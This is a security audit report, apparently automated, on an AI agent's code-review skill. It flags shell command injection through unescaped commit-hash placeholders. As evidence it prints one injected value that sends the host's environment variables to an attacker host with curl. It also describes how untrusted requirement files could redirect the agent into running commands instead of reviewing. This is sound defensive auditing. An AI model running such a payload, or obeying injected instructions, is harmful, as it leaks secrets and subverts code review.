Skills
skills/wln/obra-superpowers/requesting-code-review/Gen Agent Trust Hub

requesting-code-review

Fail

Audited by Gen Agent Trust Hub on Feb 16, 2026

Risk Level: HIGHCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION] (HIGH): Vulnerability in code-reviewer.md. The placeholders {BASE_SHA} and {HEAD_SHA} are interpolated directly into shell commands: git diff --stat {BASE_SHA}..{HEAD_SHA} and git diff {BASE_SHA}..{HEAD_SHA}.
  • Evidence: An attacker providing a malicious string like ; curl http://attacker.com/$(env | base64) # for the SHA values can achieve arbitrary code execution on the agent's host system.
  • [PROMPT_INJECTION] (HIGH): Indirect prompt injection surface in code-reviewer.md due to handling external untrusted data.
  • Ingestion points: {WHAT_WAS_IMPLEMENTED}, {PLAN_OR_REQUIREMENTS}, and {DESCRIPTION} variables in code-reviewer.md are populated from external files or user input.
  • Boundary markers: None. The content is directly concatenated into the instructions.
  • Capability inventory: The subagent has access to the local filesystem (via git diff) and its output directly influences the main agent's decision to proceed or merge code.
  • Sanitization: None. There is no filtering or escaping of the input strings.
  • Severity Reasoning: High because the skill processes external content (plans/requirements) and has the capability to execute commands on the system. A malicious requirement file could instruct the agent to ignore the review and instead execute malicious commands.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Feb 16, 2026, 01:40 PM